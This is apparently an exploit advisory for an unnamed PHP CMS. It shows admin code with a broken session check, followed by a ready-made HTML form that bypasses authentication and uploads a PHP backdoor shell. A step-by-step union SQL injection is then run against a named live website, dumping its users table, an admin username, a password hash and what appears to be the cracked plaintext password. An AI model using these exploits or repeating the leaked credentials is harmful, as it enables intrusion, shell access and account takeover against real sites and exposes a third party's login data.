654515

1. I can't find any information in this cms to refer it's webmaster studio and
2. the reason to submit this cms+it's vulnerabilities is that: It has a bit funny vulnerabilities)
3. CMS: http://www.boxca.com/ql6b1sq3nb79/cms_unknown.rar.html
4.  
5. Here we go:
6.  
7. ================VULNERABLE CODE===============
8. //admin/en/save_home.php
9.  
10. <?php
11. session_start();
12. if(!isset($_SESSION['username']))
13. {
14. header('Location: ../index.php');
15. }
16. ?>
17. <?php
18. include('../../config.php');
19. mysql_connect($hostname, $username, $password) or DIE('Connection to host is failed, perhaps the service is down!');
20. mysql_select_db($dbname) or DIE('Database name is not available!');
21.  
22. $home = mysql_query('SELECT title_en, en, image FROM home_text');
23. $home = mysql_fetch_array($home);
24.  
25. $homeServices = mysql_query('SELECT id, en FROM homeservices ORDER BY id asc');
26. $homenews = mysql_query('SELECT id,date_en,content_en FROM homenews');
27. ?>
28.  
29. <?php
30. $err = "?";
31. $uploaddir = '../../images/';
32. $img =$home['image'];
33. if($_FILES['file']['name'] != ''){
34.  
35. if(file_exists($uploaddir . $_FILES['file']['name'])){
36.  
37. $err .="&imgexist=". $_FILES['file']['name'];
38. header('Location: admin_index.php' . $err);
39. }
40. move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir . $_FILES['file']['name']);
41. $image = '../images/' . $_FILES['file']['name'];
42. mysql_query('UPDATE home_text SET image="' . $image . '"');
43. echo mysql_error();
44. if($img != ''){
45. unlink('../' . $img);
46. }
47.  
48. }
49. if(stripslashes($_POST['title']) != $home['title_en'])
50. {
51. $str= mysql_real_escape_string(stripslashes($_POST['title']));
52. mysql_query('UPDATE home_text SET title_en="' . $str . '"');
53.  
54. }
55. if(stripslashes($_POST['about']) != $home['en'])
56. {
57. $str= mysql_real_escape_string(stripslashes($_POST['about']));
58. mysql_query('UPDATE home_text SET en=\'' . $str . '\'');
59. }
60.  
61. for($i = 0; $i < count($_POST['serv_arr']) ; $i++)
62. {
63. $data = mysql_fetch_array($homeServices);
64.  
65. if($_POST['serv_arr'][$i] != ""){
66. if(stripslashes($_POST['serv_arr'][$i]) != $data['en']){
67. $str = mysql_real_escape_string(stripslashes($_POST['serv_arr'][$i]));
68. mysql_query('UPDATE homeservices SET en="'.$str. '" WHERE id="' . $data['id'] . '"');
69. }
70. }
71. else{
72. mysql_query('DELETE FROM homeservices WHERE id=' . $data['id'] );
73. }
74. }
75. if($_POST['new_serv'] !=""){
76. $str = mysql_real_escape_string(stripslashes($_POST['new_serv']));
77. mysql_query('INSERT INTO homeservices(en) VALUES("' . $str .'")');
78. }
79.  
80. for($i = 0; $i < count($_POST['date']) ; $i++)
81. {
82. $data = mysql_fetch_array($homenews);
83. if($_POST['date'][$i] != $data['date_en'] || $_POST['new'][$i] != $data['content_en']){
84. $str1 = mysql_real_escape_string(stripslashes($_POST['date'][$i]));
85. $str2 = mysql_real_escape_string(stripslashes($_POST['new'][$i]));
86. mysql_query('UPDATE homenews SET date_en="' . $str1 . '" WHERE id=' .$data['id'] );
87. mysql_query('UPDATE homenews SET content_en="' . $str2 .'" WHERE id=' .$data['id']);
88. }
89. }
90.  
91. header('Location: admin_index.php?page=home');
92. ?>
93.  
94. ============END OF VULNERABLE CODE=============
95.  
96. Notice Flaw in session checking thing)
97.  
98. Here is our:
99. ====AUTH BYPASS + REMOTE SHELL UPLOAD EXPLOIT===
100.  
101.  
102. <!DOCTYPE HTML>
103. <head>
104. <title></title>
105. </head>
106. <body>
107. <center>
108. <form method="post" action="http://TARGET_SITE/admin/en/save_home.php" enctype="multipart/form-data">
109. <input type="hidden" name="title" value="SIKDIR!">
110. <br>
111. <br>
112. <label>Selet your backdoor:(1)</label>
113. <input type="file" name="file" accept="image/*">==&gt;(2)
114. <input type="hidden" name="about" readonly="true" value="Sikdir!">
115. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
116. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
117. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
118. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
119. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
120. <input type="hidden" name="serv_arr[]" value="SIKDIR!">
121. <input type="hidden" name="new_serv" placeholder="SIKDIR!">
122. <input type="hidden" name="date[]" value="sikdir!">
123. <input type="hidden" name="new[]" value="AUTH BYPASS + SHELL UPLOAD EXPLOIT BY AKASTEP">
124. <input type="hidden" name="date[]" value="SIKDIR!">
125. <input type="hidden" name="new[]" value="sikdir!">
126. <input type="submit" value="PwN IT ASAP))">
127. <!-- You shell can be found here:=> site.tld/images/yourfilename.php -->
128. </form>
129. </center>
130. </body>
131. </html>
132.  
133.  
134. ==============END OF EXPLOIT================
135.  
136.  
137.  
138.  
139. BLind SQLi Vulnerability:
140.  
141. ==============Vulnerable Code==================
142. //ru/services.php
143.  
144. <?php
145. $id = mysql_query('SELECT max(id) as max, min(id) as min FROM services');
146. $id = mysql_fetch_array($id);
147. if(isset($_GET['id']) && $_GET['id'] >=$id['min'] && $_GET['id'] <= $id['max'])
148. {
149. $text = mysql_query('SELECT image,service_name_ru,service_full_text_ru FROM services where id=' . $_GET["id"]);
150. $text = mysql_fetch_array($text);
151. echo '<div class="serv_image">
152. <img style="margin-top: 80px;" src="' . $text["image"] . '" width="345" height="210" alt="FINTAX" />
153. <div class="shad_left"></div>
154. <div class="shad_right"></div>
155. </div>
156. <div class="serv_text">
157. <p class="service_title">' . $text["service_name_ru"] . '</p>
158. <p class="service_description">' . $text["service_full_text_ru"] . '</p>
159. </div>
160. <div class="clear"></div>';
161. }
162.  
163. ==============END OF Vulnerable Code============
164.  
165.  
166.  
167. http://www.fintax.am/ru/index.php?page=services&id=1 order by 3--
168.  
169.  
170.  
171. 1,2,3
172.  
173.  
174. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,2,3 LIMIT 1 offset 1*/--
175.  
176.  
177.  
178.  
179. 5.1.62-cll
180.  
181.  
182.  
183.  
184. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns limit 1)),3 limit 1 offset 1*/--
185.  
186.  
187.  
188.  
189. mysql> select 0x7573657273 \g
190. --------------
191. | 0x7573657273 |
192. --------------
193. | users |
194. --------------
195. 1 row in set (0.00 sec)
196.  
197. mysql>
198.  
199.  
200.  
201. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(table_name) from information_schema.tables where table_schema=database() limit 1 offset 11)),3 limit 1 offset 1*/--
202.  
203.  
204.  
205.  
206.  
207.  
208. COlumnlari:
209.  
210. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns where table_name=0x7573657273 limit 1 offset 0)),3 limit 1 offset 1*/--
211.  
212.  
213.  
214. id
215.  
216.  
217. hex(group_concat(username,0x7c,password)) from users
218.  
219. username
220.  
221.  
222. mysql> select 0x757365726E616D65 \g
223. --------------------
224. | 0x757365726E616D65 |
225. --------------------
226. | username |
227. --------------------
228. 1 row in set (0.00 sec)
229.  
230.  
231. password
232.  
233.  
234.  
235. mysql> select 0x70617373776F7264 \g
236. --------------------
237. | 0x70617373776F7264 |
238. --------------------
239. | password |
240. --------------------
241. 1 row in set (0.00 sec)
242.  
243.  
244.  
245.  
246.  
247.  
248. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(group_concat(username,0x7c,password)) from users)),3 limit 1 offset 1*/--
249.  
250.  
251.  
252.  
253. mysql> select 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 \
254. -> \g
255. ------------------------------------------------------------------------------------------
256. | 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 |
257. ------------------------------------------------------------------------------------------
258. | fintax2012|6669a8a123106e6a0d3d76e8ceababf8 |
259. ------------------------------------------------------------------------------------------
260. 1 row in set (0.00 sec)
261.  
262. mysql>
263.  
264.  
265.  
266.  
267.  
268. http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select convert(group_concat(username,0x7c,password) using latin1) from users)),3 limit 1 offset 1*/--
269.  
270. fintax2012|6669a8a123106e6a0d3d76e8ceababf8
271.  
272.  
273. fintax2012
274. supersecret1010
275.  
276.  
277.  
278.  
279. And Finally i want to say that you can fingerprint this cms using the following technique:
280. When entering incorrect password for admin it gives
281.  
282. header('Location: index.php?err=asd');
283.  
284. /admin/index.php?err=asd
285.  
286. Notice: asd <= This is a hardcoded value in /admin/loginproc.php
287.  
288.  
289.  
290. ================================================
291. SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
292. ================================================
293. packetstormsecurity.org
294. packetstormsecurity.com
295. packetstormsecurity.net
296. securityfocus.com
297. cxsecurity.com
298. security.nnov.ru
299. securtiyvulns.com
300. securitylab.ru
301. secunia.com
302. securityhome.eu
303. exploitsdownload.com
304. exploit-db.com
305. osvdb.com
306. websecurity.com.ua
307.  
308. to all Aa Team + to all Azerbaijan Black HatZ +
309. *Especially to my bro CAMOUFL4G3 *
310. Also special thanks to: ottoman38 & HERO_AZE
311. ================================================
312.  
313. /AkaStep